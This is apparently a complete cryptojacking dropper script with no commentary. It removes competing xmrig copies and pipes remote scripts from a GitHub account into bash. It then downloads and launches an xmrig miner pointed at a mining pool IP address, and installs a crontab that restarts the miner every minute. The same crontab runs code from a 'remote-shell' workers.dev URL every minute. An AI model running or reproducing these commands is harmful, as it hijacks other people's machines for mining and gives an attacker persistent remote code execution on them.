mkdir /tmp
mkdir /home
rm /etc/xmrig
rm xmrig
pkill xmrig
rm -rf c3pool
rm /tmp/xmrig
rm /home/xmrig
if (( $(top -b -n 1 | grep xmrig | wc -l) == "0" ))
then
  pkill xmrig
  find / -name xmrig | xargs rm -f
fi
curl -Ls https://raw.githubusercontent.com/aldnesjxeakxs/scripts/main/1.sh | bash
curl -Ls https://raw.githubusercontent.com/aldnesjxeakxs/scripts/main/sep.sh | bash
curl -k https://github.com/aldnesjxeakxs/scripts/raw/main/xmrig -o /home/xmrig
chmod 777 /home/xmrig
curl -k https://github.com/aldnesjxeakxs/scripts/raw/main/xmrig -o /tmp/xmrig
chmod 777 /tmp/xmrig
/tmp/xmrig -o 139.59.121.142:3333 -B --tls

echo '* * * * * if (( $(top -b -n 1 | grep xmrig | wc -l) == "0" ));then /home/xmrig -o 139.59.121.142:3333 -B --tls;fi' > c
echo '* * * * * sh -c "$(curl -Ls https://remote-shell.mengxin827899.workers.dev)" >> /dev/null' >> c
crontab c
rm -f c
